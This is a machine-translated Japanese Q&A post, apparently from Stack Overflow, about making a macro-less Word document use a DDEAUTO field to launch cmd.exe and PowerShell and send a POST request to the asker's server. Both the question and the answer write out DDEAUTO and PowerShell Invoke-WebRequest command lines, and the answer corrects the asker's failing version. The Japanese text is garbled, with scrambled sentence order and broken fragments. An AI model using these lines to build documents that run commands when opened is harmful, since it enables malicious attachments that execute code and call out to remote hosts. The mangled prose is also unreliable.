投稿データをDDEAUTO MS Wordで送信する

Question

私はいくつかのテストを行っていて、私のサーバーにpingするためのマクロレスワード文書を取得したいと考えています。

私はそれがペイロード（先にhttps://sensepost.com/blog/2017/macro-less-code-exec-in-msword/を参照）によって先行して行われていることは知っていますが、ここでの目標はリクエスト以上のものではありません。

Invoke-WebRequest -UseBasicParsing http://myip -ContentType "application/json" -Method POST -Body "{ 'Item':'word', 'id':1}" 

DDEAUTOコマンド（https://msdn.microsoft.com/en-us/library/ff531181(v=office.12).aspx）から：

私の目標は、ここでの線に沿って何かを実行することです。

私が直接、CMDを通じてPowerShellを実行するPowerShellを試みたが、私はの線に沿って何か期待した任意の結果

取得するために管理していませんでした：働いて、それはdoesnのする

DDEAUTO c:\\Windows\\System32\\cmd.exe "powershell -e Invoke-WebRequest -UseBasicParsing http://myip -ContentType "application/json" -Method POST -Body "{ 'Item':3661515, 'Name':'test'}"" \p 

をそうではないようです。

ありがとうございました！それはコマンドを実行した後、あなたが好きなものを使用する必要があり

Answer 1

、

/Kはオープ​​ンコマンドラインを維持します。あなたは

-commandは、コマンドに指定するには、cmdはコマンドの後に自動的に閉じるようにしたい場合は、これを削除すること自由に感じ

{}ハッシュテーブル引用符でこれを置く必要はありません

{キー：値;キー：値};は、セパレータない、

cmd.exe "/k powershell -command Invoke-WebRequest -UseBasicParsing http://google.com -ContentType 'application/json' -Method POST -Body { Item:3661515; Name:'test'}"